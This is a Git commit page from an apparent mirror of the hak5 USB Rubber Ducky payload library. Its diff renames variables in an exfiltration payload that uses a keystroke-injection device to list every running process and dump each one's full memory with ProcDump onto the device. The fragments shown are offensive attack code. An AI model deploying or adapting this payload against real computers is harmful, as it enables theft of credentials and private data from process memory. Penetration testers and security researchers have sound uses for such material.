hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Redefined DEFINEtions from $ to #

pull/444/head
Aleff 2024-06-01 10:47:20 +02:00
parent 821255659e
commit f143daa518
2 changed files with 5 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/README.md
View File

@ -34,8 +34,8 @@ To obtain all active process PIDs the tasklist command is used, which provides t
1. Download ProcDump\[5]. 1. Download ProcDump\[5].
2. Move the extracted ProcDump folder or directly the executable, as you prefer, inside Rubber Ducky's memory. 2. Move the extracted ProcDump folder or directly the executable, as you prefer, inside Rubber Ducky's memory.
3. Then you have to change the variable `$WHAT_EXE_DO_YOU_WANT_TO_USE` if you want to use an executable other than `procdump64a.exe`, i.e. `procdump.exe` and, in this case, you have to change the variable to `procdump`. 3. Then you have to change the variable `#WHAT_EXE_DO_YOU_WANT_TO_USE` if you want to use an executable other than `procdump64a.exe`, i.e. `procdump.exe` and, in this case, you have to change the variable to `procdump`.
4. When you put the executable(s) inside the Rubber Ducky memory you must indicate the path where is stored, i.e. if the executable is inside the path `F:\ProcDump\Procdump\procdump.exe` you must change the variable `$PATH_TO_EXE` into `\ProcDump\Procdump\` mean while if it is inside the path `F:\somethingelse\procdump.exe` you must change this variable into `\somethingelse\`. 4. When you put the executable(s) inside the Rubber Ducky memory you must indicate the path where is stored, i.e. if the executable is inside the path `F:\ProcDump\Procdump\procdump.exe` you must change the variable `#PATH_TO_EXE` into `\ProcDump\Procdump\` mean while if it is inside the path `F:\somethingelse\procdump.exe` you must change this variable into `\somethingelse\`.
## Read More ## Read More

7
payloads/library/exfiltration/Dump_Windows_Memory_Through_ProcDump/payload.txt
View File

@ -14,15 +14,14 @@ REM - Authorization to execute powershell commands
REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
DEFINE $WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a
REM Path to the EXE file stored in the usb, i.e. if 'F:\ProcDump\Procdump\procdump.exe' you must use '\ProcDump\Procdump\' REM Path to the EXE file stored in the usb, i.e. if 'F:\ProcDump\Procdump\procdump.exe' you must use '\ProcDump\Procdump\'
DEFINE $PATH_TO_EXE \ProcDump\Procdump\ DEFINE #PATH_TO_EXE \ProcDump\Procdump\
REM Driver Label of your RubberDucky - Default: DUCKY REM Driver Label of your RubberDucky - Default: DUCKY
DEFINE #DUCKY_DRIVE_LABEL DUCKY DEFINE #DUCKY_DRIVE_LABEL DUCKY
EXTENSION DETECT_READY EXTENSION DETECT_READY
REM VERSION 1.1 REM VERSION 1.1
REM AUTHOR: Korben REM AUTHOR: Korben
@ -66,7 +65,7 @@ STRINGLN_POWERSHELL
foreach ($i in $a){ foreach ($i in $a){
if ( $i -like '*PID*'){ if ( $i -like '*PID*'){
$i -match 'PID.\s+(.+)'; $i -match 'PID.\s+(.+)';
".$PATH_TO_EXE$WHAT_EXE_DO_YOU_WANT_TO_USE.exe" -ma $matches[1]; ".#PATH_TO_EXE#WHAT_EXE_DO_YOU_WANT_TO_USE.exe" -ma $matches[1];
} }
} }
exit; exit;